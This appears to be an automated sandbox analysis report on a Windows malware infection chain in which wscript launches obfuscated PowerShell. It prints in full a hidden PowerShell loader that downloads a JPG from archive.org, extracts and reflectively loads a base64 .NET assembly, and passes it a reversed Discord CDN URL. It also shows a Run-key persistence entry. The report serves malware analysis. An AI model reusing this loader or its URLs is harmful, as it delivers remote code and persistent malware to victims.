                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportType source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromSig source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumEvents source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamForMethodIndex source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineField source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodsWithName source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsGlobal source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetEventProps source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp

                      Data Obfuscation

                      barindex
                      Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: .Run("powershell -command $Codigo = 'J? ? ? ? Bp? ? ? ? G0? ? ? ? YQBn? ? ? ?", "0", "false");
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: $Codigo = 'J? ? ? ? Bp? ? ? ? G0? ? ? ? YQBn? ? ? ? GU? ? ? ? VQBy? ? ? ? Gw? ? ? ? I? ? ? ? ? ? ? ? 9? ? ? ? C? ? ? ? ? ? ? ? JwBo? ? ? ? HQ? ? ? ? d? ? ? ? Bw? ? ? ? HM? ? ? ? Og? ? ? ? v? ? ? ? C8? ? ? ? aQBh? ? ? ? DY? ? ? ? M? ? ? ? ? ? ? ? x? ? ? ? DY? ? ? ? M? ? ? ? ? ? ? ? 2? ? ? ? C4? ? ? ? dQBz? ? ? ? C4? ? ? ? YQBy? ? ? ? GM? ? ? ? a? ? ? ? Bp? ? ? ? HY? ? ? ? ZQ? ? ? ? u? ? ? ? G8? ? ? ? cgBn? ? ? ? C8? ? ? ? MQ? ? ? ? w? ? ? ? C8? ? ? ? aQB0? ? ? ? GU? ? ? ? bQBz? ? ? ? C8? ? ? ? Z? ? ? ? Bl? ? ? ? GE? ? ? ? d? ? ? ? Bo? ? ? ? G4? ? ? ? bwB0? ? ? ? GU? ? ? ? Xw? ? ? ? y? ? ? ? D? ? ? ? ? ? ? ? Mg? ? ? ? 0? ? ? ? D? ? ? ? ? ? ? ? Nw? ? ? ? v? ? ? ? GQ? ? ? ? ZQBh? ? ? ? HQ? ? ? ? a? ? ? ? Bu? ? ? ? G8? ? ? ? d? ? ? ? Bl? ? ? ? C4? ? ? ? agBw? ? ? ? Gc? ? ? ? Jw? ? ? ? 7? ? ? ? CQ? ? ? ? dwBl? ? ? ? GI? ? ? ? QwBs? ? ? ? Gk? ? ? ? ZQBu? ? ? ? HQ? ? ? ? I? ? ? ? ? ? ? ? 9? ? ? ? C? ? ? ? ? ? ? ? TgBl? ? ? ? Hc? ? ? ? LQBP? ? ? ? GI? ? ? ? agBl? ? ? ? GM? ? ? ? d? ? ? ? ? ? ? ? g? ? ? ? FM? ? ? ? eQBz? ? ? ? HQ? ? ? ? ZQBt? ? ? ? C4? ? ? ? TgBl? ? ? ? HQ? ? ? ? LgBX? ? ? ? GU? ? ? ? YgBD? ? ? ? Gw? ? ? ? aQBl? ? ? ? G4? ? ? ? d? ? ? ? ? ? ? ? 7? ? ? ? CQ? ? ? ? aQBt? ? ? ? GE? ? ? ? ZwBl? ? ? ? EI? ? ? ? eQB0? ? ? ? GU? ? ? ? cw? ? ? ? g? ? ? ? D0? ? ? ? I? ? ? ? ? ? ? ? k? ? ? ? Hc? ? ? ? ZQBi? ? ? ? EM? ? ? ? b? ? ? ? Bp? ? ? ? GU? ? ? ? bgB0? ? ? ? C4? ? ? ? R? ? ? ? Bv? ? ? ? Hc? ? ? ? bgBs? ? ? ? G8? ? ? ? YQBk? ? ? ? EQ? ? ? ? YQB0? ? ? ? GE? ? ? ? K? ? ? ? ? ? ? ? k? ? ? ? Gk? ? ? ? bQBh? ? ? ? Gc? ? ? ? ZQBV? ? ? ? HI? ? ? ? b? ? ? ? ? ? ? ? p? ? ? ? Ds? ? ? ? J? ? ? ? Bp? ? ? ? G0? ? ? ? YQBn? ? ? ? GU? ? ? ? V? ? ? ? Bl? ? ? ? Hg? ? ? ? d? ? ? ? ? ? ? ? g? ? ? ? D0? ? ? ? I? ? ? ? Bb? ? ? ? FM? ? ? ? eQBz? ? ? ? HQ? ? ? ? ZQBt? ? ? ? C4? ? ? ? V? ? ? ? Bl? ? ? ? Hg? ? ? ? d? ? ? ? ? ? ? ? u? ? ? ? EU? ? ? ? bgBj? ? ? ? G8? ? ? ? Z? ? ? ? Bp? ? ? ? G4? ? ? ? ZwBd? ? ? ? Do? ? ? ? OgBV? ? ? ? FQ? ? ? ? Rg? ? ? ? 4? ? ? ? C4? ? ? ? RwBl? ? ? ? HQ? ? ? ? UwB0? ? ? ? HI? ? ? ? aQBu? ? ? ? Gc? ? ? ? K? ? ? ? ? ? ? ? k? ? ? ? Gk? ? ? ? bQBh? ? ? ? Gc? ? ? ? ZQBC? ? ? ? Hk? ? ? ? d? ? ? ? Bl? ? ? ? HM? ? ? ? KQ? ? ? ? 7? ? ? ? CQ? ? ? ? cwB0? ? ? ? GE? ? ? ? cgB0? ? ? ? EY? ? ? ? b? ? ? ? Bh? ? ? ? Gc? ? ? ? I? ? ? ? ? ? ? ? 9? ? ? ? C? ? ? ? ? ? ? ? Jw? ? ? ? 8? ? ? ? Dw? ? ? ? QgBB? ? ? ? FM? ? ? ? RQ? ? ? ? 2? ? ? ? DQ? ? ? ? XwBT? ? ? ? FQ? ? ? ? QQBS? ? ? ? FQ? ? ? ? Pg? ? ? ? +? ? ? ? Cc? ? ? ? Ow? ? ? ? k? ? ? ? GU? ? ? ? bgBk? ? ? ? EY? ? ? ? b? ? ? ? Bh? ? ? ? Gc? ? ? ? I? ? ? ? ? ? ? ? 9? ? ? ? C? ? ? ? ? ? ? ? Jw? ? ? ? 8? ? ? ? Dw? ? ? ? QgBB? ? ? ? FM? ? ? ? RQ? ? ? ? 2? ? ? ? DQ? ? ? ? XwBF? ? ? ? E4? ? ? ? R? ? ? ? ? ? ? ? +? ? ? ? D4? ? ? ? Jw? ? ? ? 7?
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? Bp? ? ? ? G0? ? ? ? YQBn? ? ? ? GU? ? ? ? VQBy? ? ? ? Gw? ? ? ? I? ? ? ? ? ? ? ? 9? ? ? ? C? ? ? ? ? ? ? ? JwBo? ? ? ? HQ? ? ? ? d? ? ? ? Bw? ? ? ? HM? ? ? ? Og? ? ? ? v? ? ? ? C8? ? ? ? aQBh? ? ? ? DY? ? ? ? M? ? ? ? ? ? ? ? x? ? ? ? DY? ? ? ? M? ? ? ? ? ? ? ? 2? ? ? ? C4? ? ? ? dQBz? ? ? ? C4? ? ? ? YQBy? ? ? ? GM? ? ? ? a? ? ? ? Bp? ? ? ? HY? ? ? ? ZQ? ? ? ? u? ? ? ? G8? ? ? ? cgBn? ? ? ? C8? ? ? ? MQ? ? ? ? w? ? ? ? C8? ? ? ? aQB0? ? ? ? GU? ? ? ? bQBz? ? ? ? C8? ? ? ? Z? ? ? ? Bl? ? ? ? GE? ? ? ? d? ? ? ? Bo? ? ? ? G4? ? ? ? bwB0? ? ? ? GU? ? ? ? Xw? ? ? ? y? ? ? ? D? ? ? ? ? ? ? ? Mg? ? ? ? 0? ? ? ? D? ? ? ? ? ? ? ? Nw? ? ? ? v? ? ? ? GQ? ? ? ? ZQBh? ? ? ? HQ? ? ? ? a? ? ? ? Bu? ? ? ? G8? ? ? ? d? ? ? ? Bl? ? ? ? C4? ? ? ? agBw? ? ? ? Gc? ? ? ? Jw? ? ? ? 7? ? ? ? CQ? ? ? ? dwBl? ? ? ? GI? ? ? ? QwBs? ? ? ? Gk? ? ? ? ZQBu? ? ? ? HQ? ? ? ? I? ? ? ? ? ? ? ? 9? ? ? ? C? ? ? ? ? ? ? ? TgBl? ? ? ? Hc? ? ? ? LQBP? ? ? ? GI? ? ? ? agBl? ? ? ? GM? ? ? ? d? ? ? ? ? ? ? ? g? ? ? ? FM? ? ? ? eQBz? ? ? ? HQ? ? ? ? ZQBt? ? ? ? C4? ? ? ? TgBl? ? ? ? HQ? ? ? ? LgBX? ? ? ? GU? ? ? ? YgBD? ? ? ? Gw? ? ? ? aQBl? ? ? ? G4? ? ? ? d? ? ? ? ? ? ? ? 7? ? ? ? CQ? ? ? ? aQBt? ? ? ? GE? ? ? ? ZwBl? ? ? ? EI? ? ? ? eQB0? ? ? ? GU? ? ? ? cw? ? ? ? g? ? ? ? D0? ? ? ? I? ? ? ? ? ? ? ? k? ? ? ? Hc? ? ? ? ZQBi? ? ? ? EM? ? ? ? b? ? ? ? Bp? ? ? ? GU? ? ? ? bgB0? ? ? ? C4? ? ? ? R? ? ? ? Bv? ? ? ? Hc? ? ? ? bgBs? ? ? ? G8? ? ? ? YQBk? ? ? ? EQ? ? ? ? YQB0? ? ? ? GE? ? ? ? K? ? ? ? ? ? ? ? k? ? ? ? Gk? ? ? ? bQBh? ? ? ? Gc? ? ? ? ZQBV? ? ? ? HI? ? ? ? b? ? ? ? ? ? ? ? p? ? ? ? Ds? ? ? ? J? ? ? ? Bp? ? ? ? G0? ? ? ? YQBn? ? ? ? GU? ? ? ? V? ? ? ? Bl? ? ? ? Hg? ? ? ? d? ? ? ? ? ? ? ? g? ? ? ? D0? ? ? ? I? ? ? ? Bb? ? ? ? FM? ? ? ? eQBz? ? ? ? HQ? ? ? ? ZQBt? ? ? ? C4? ? ? ? V? ? ? ? Bl? ? ? ? Hg? ? ? ? d? ? ? ? ? ? ? ? u? ? ? ? EU? ? ? ? bgBj? ? ? ? G8? ? ? ? Z? ? ? ? Bp? ? ? ? G4? ? ? ? ZwBd? ? ? ? Do? ? ? ? OgBV? ? ? ? FQ? ? ? ? Rg? ? ? ? 4? ? ? ? C4? ? ? ? RwBl? ? ? ? HQ? ? ? ? UwB0? ? ? ? HI? ? ? ? aQBu? ? ? ? Gc? ? ? ? K? ? ? ? ? ? ? ? k? ? ? ? Gk? ? ? ? bQBh? ? ? ? Gc? ? ? ? ZQBC? ? ? ? Hk? ? ? ? d? ? ? ? Bl? ? ? ? HM? ? ? ? KQ? ? ? ? 7? ? ? ? CQ? ? ? ? cwB0? ? ? ? GE? ? ? ? cgB0? ? ? ? EY? ? ? ? b? ? ? ? Bh? ? ? ? Gc? ? ? ? I? ? ? ? ? ? ? ? 9? ? ? ? C? ? ? ? ? ? ? ? Jw? ? ? ? 8? ? ? ? Dw? ? ? ? QgBB? ? ? ? FM? ? ? ? RQ? ? ? ? 2? ? ? ? DQ? ? ? ? XwBT? ? ? ? FQ? ? ? ? QQBS? ? ? ? FQ? ? ? ? Pg? ? ? ? +? ? ? ? Cc? ? ? ? Ow? ? ? ? k? ? ? ? GU? ? ? ? bgBk? ? ? ? EY? ? ? ? b? ? ? ? Bh? ? ? ? Gc? ? ? ? I? ? ? ? ? ? ? ? 9? ? ? ? C? ? ? ? ? ? ? ? Jw? ? ? ? 8? ? ? ? Dw? ? ? ? QgBB?
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601606.us.archive.org/10/items/deathnote_202407/deathnote.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('&f815e5fb749106f21729c58ee9d5d4362f113d9dbc69e72e0b64b3c04c574c1d=mh&03aacc66=si&0bbfdc66=xe?txt.GIRO/9282559141872667721/9547513900813347721/stnemhcatta/moc.ppadrocsid.ndc//:sptth' , '1' , 'C:\ProgramData\' , 'padral','InstallUtil','desativado'))"
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? Bp? ? ? ? G0? ? ? ? YQBn? ? ? ? GU? ? ? ? VQBy? ? ? ? Gw? ? ? ? I? ? ? ? ? ? ? ? 9? ? ? ? C? ? ? ? ? ? ? ? JwBo? ? ? ? HQ? ? ? ? d? ? ? ? Bw? ? ? ? HM? ? ? ? Og? ? ? ? v? ? ? ? C8? ? ? ? aQBh? ? ? ? DY? ? ? ? M? ? ? ? ? ? ? ? x? ? ? ? DY? ? ? ? M? ? ? ? ? ? ? ? 2? ? ? ? C4? ? ? ? dQBz? ? ? ? C4? ? ? ? YQBy? ? ? ? GM? ? ? ? a? ? ? ? Bp? ? ? ? HY? ? ? ? ZQ? ? ? ? u? ? ? ? G8? ? ? ? cgBn? ? ? ? C8? ? ? ? MQ? ? ? ? w? ? ? ? C8? ? ? ? aQB0? ? ? ? GU? ? ? ? bQBz? ? ? ? C8? ? ? ? Z? ? ? ? Bl? ? ? ? GE? ? ? ? d? ? ? ? Bo? ? ? ? G4? ? ? ? bwB0? ? ? ? GU? ? ? ? Xw? ? ? ? y? ? ? ? D? ? ? ? ? ? ? ? Mg? ? ? ? 0? ? ? ? D? ? ? ? ? ? ? ? Nw? ? ? ? v? ? ? ? GQ? ? ? ? ZQBh? ? ? ? HQ? ? ? ? a? ? ? ? Bu? ? ? ? G8? ? ? ? d? ? ? ? Bl? ? ? ? C4? ? ? ? agBw? ? ? ? Gc? ? ? ? Jw? ? ? ? 7? ? ? ? CQ? ? ? ? dwBl? ? ? ? GI? ? ? ? QwBs? ? ? ? Gk? ? ? ? ZQBu? ? ? ? HQ? ? ? ? I? ? ? ? ? ? ? ? 9? ? ? ? C? ? ? ? ? ? ? ? TgBl? ? ? ? Hc? ? ? ? LQBP? ? ? ? GI? ? ? ? agBl? ? ? ? GM? ? ? ? d? ? ? ? ? ? ? ? g? ? ? ? FM? ? ? ? eQBz? ? ? ? HQ? ? ? ? ZQBt? ? ? ? C4? ? ? ? TgBl? ? ? ? HQ? ? ? ? LgBX? ? ? ? GU? ? ? ? YgBD? ? ? ? Gw? ? ? ? aQBl? ? ? ? G4? ? ? ? d? ? ? ? ? ? ? ? 7? ? ? ? CQ? ? ? ? aQBt? ? ? ? GE? ? ? ? ZwBl? ? ? ? EI? ? ? ? eQB0? ? ? ? GU? ? ? ? cw? ? ? ? g? ? ? ? D0? ? ? ? I? ? ? ? ? ? ? ? k? ? ? ? Hc? ? ? ? ZQBi? ? ? ? EM? ? ? ? b? ? ? ? Bp? ? ? ? GU? ? ? ? bgB0? ? ? ? C4? ? ? ? R? ? ? ? Bv? ? ? ? Hc? ? ? ? bgBs? ? ? ? G8? ? ? ? YQBk? ? ? ? EQ? ? ? ? YQB0? ? ? ? GE? ? ? ? K? ? ? ? ? ? ? ? k? ? ? ? Gk? ? ? ? bQBh? ? ? ? Gc? ? ? ? ZQBV? ? ? ? HI? ? ? ? b? ? ? ? ? ? ? ? p? ? ? ? Ds? ? ? ? J? ? ? ? Bp? ? ? ? G0? ? ? ? YQBn? ? ? ? GU? ? ? ? V? ? ? ? Bl? ? ? ? Hg? ? ? ? d? ? ? ? ? ? ? ? g? ? ? ? D0? ? ? ? I? ? ? ? Bb? ? ? ? FM? ? ? ? eQBz? ? ? ? HQ? ? ? ? ZQBt? ? ? ? C4? ? ? ? V? ? ? ? Bl? ? ? ? Hg? ? ? ? d? ? ? ? ? ? ? ? u? ? ? ? EU? ? ? ? bgBj? ? ? ? G8? ? ? ? Z? ? ? ? Bp? ? ? ? G4? ? ? ? ZwBd? ? ? ? Do? ? ? ? OgBV? ? ? ? FQ? ? ? ? Rg? ? ? ? 4? ? ? ? C4? ? ? ? RwBl? ? ? ? HQ? ? ? ? UwB0? ? ? ? HI? ? ? ? aQBu? ? ? ? Gc? ? ? ? K? ? ? ? ? ? ? ? k? ? ? ? Gk? ? ? ? bQBh? ? ? ? Gc? ? ? ? ZQBC? ? ? ? Hk? ? ? ? d? ? ? ? Bl? ? ? ? HM? ? ? ? KQ? ? ? ? 7? ? ? ? CQ? ? ? ? cwB0? ? ? ? GE? ? ? ? cgB0? ? ? ? EY? ? ? ? b? ? ? ? Bh? ? ? ? Gc? ? ? ? I? ? ? ? ? ? ? ? 9? ? ? ? C? ? ? ? ? ? ? ? Jw? ? ? ? 8? ? ? ? Dw? ? ? ? QgBB? ? ? ? FM? ? ? ? RQ? ? ? ? 2? ? ? ? DQ? ? ? ? XwBT? ? ? ? FQ? ? ? ? QQBS? ? ? ? FQ? ? ? ? Pg? ? ? ? +? ? ? ? Cc? ? ? ? Ow? ? ? ? k? ? ? ? GU? ? ? ? bgBk? ? ? ? EY? ? ? ? b? ? ? ? Bh? ? ? ? Gc? ? ? ? I? ? ? ? ? ? ? ? 9? ? ? ? C? ? ? ? ? ? ? ? Jw? ? ? ? 8? ? ? ? Dw? ? ? ? QgBB? Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601606.us.archive.org/10/items/deathnote_202407/deathnote.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('&f815e5fb749106f21729c58ee9d5d4362f113d9dbc69e72e0b64b3c04c574c1d=mh&03aacc66=si&0bbfdc66=xe?txt.GIRO/9282559141872667721/9547513900813347721/stnemhcatta/moc.ppadrocsid.ndc//:sptth' , '1' , 'C:\ProgramData\' , 'padral','InstallUtil','desativado'))"Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF848D200BD pushad ; iretd 2_2_00007FF848D200C1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF848D22628 push edx; iretd 2_2_00007FF848D22636
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FF848D300BD pushad ; iretd 4_2_00007FF848D300C1

                      Boot Survival

                      barindex
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Path C:\ProgramData\padral.jsJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run PathJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run PathJump to behavior
                      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
